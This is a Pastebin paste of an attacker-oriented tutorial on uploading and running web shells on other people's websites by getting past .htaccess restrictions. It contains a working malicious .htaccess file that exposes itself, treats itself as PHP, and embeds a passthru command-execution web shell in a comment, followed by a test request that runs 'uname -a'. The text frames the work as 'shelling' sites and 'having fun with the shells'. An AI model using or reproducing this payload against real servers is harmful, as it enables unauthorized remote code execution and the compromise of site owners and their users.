API tools faq
paste
Advertisement
Kyfx

Bypassing .htaccess permissions & Uploading Shells to Server

Kyfx
Jun 20th, 2015
670
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.98 KB | None | 0 0
raw download clone embed print report
  1. Hi guys, today I'll be explaining a little something that has helped me occasionally when I try and shell a website. It is one of the many ways that help me to upload a shell to a server. Often, we run into situations when you can't upload a php file to the server or sometimes after uploading, the shell cannot be executed. It is probably because SetHandler is being used. We can easily bypass the restriction by modifying the .htaccess file on the server. How do we do it? We use another .htaccess file which can be accessed through a url and when executed, dynamically modifies the original .htaccess file. For this tutorial, we'll be working in a scenario in which the shell was uploaded successfully but cannot be executed due to some kind of restriction.
  2.  
  3. So in this scenario, you go ahead and upload the shell. Now when you try and access the shell and execute it, you'll be welcomed with a forbidden screen usually stating that you do not have the required permissions to access the file on the server.
  4. Now you know the admin is not shit. Well rather a big shit. So what we will try to do now is upload our own .htacess file onto the server and divert the original .htaccess file by including any of our codes between comments.
  5.  
  6. Code:
  7. <Files ~ "^\.ht">
  8. Order allow,deny
  9. Allow from all
  10. </Files>
  11.  
  12. AddType application/x-httpd-php .htaccess
  13.  
  14. # <?php echo "";echo"";passthru($_GET['cmd']." 2>&1"); ?>#
  15.  
  16. The first line in the Files parameter simply overrides the default permission settings for the .htaccess file so that now it can be accessed and modified through an external URL. The next line will make sure our file is interpreted as a php file and the last line as comments is the actual code we want the execute, which is our shell.
  17.  
  18. Now head over to the url where you have uploaded the .htaccess file and use:
  19. Code:
  20. .htaccess?cmd=uname%20-a
  21.  
  22. to see whether it worked.
  23.  
  24. Now you have successfully overwritten the permissions on this server and you can go ahead and have fun with the shells.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!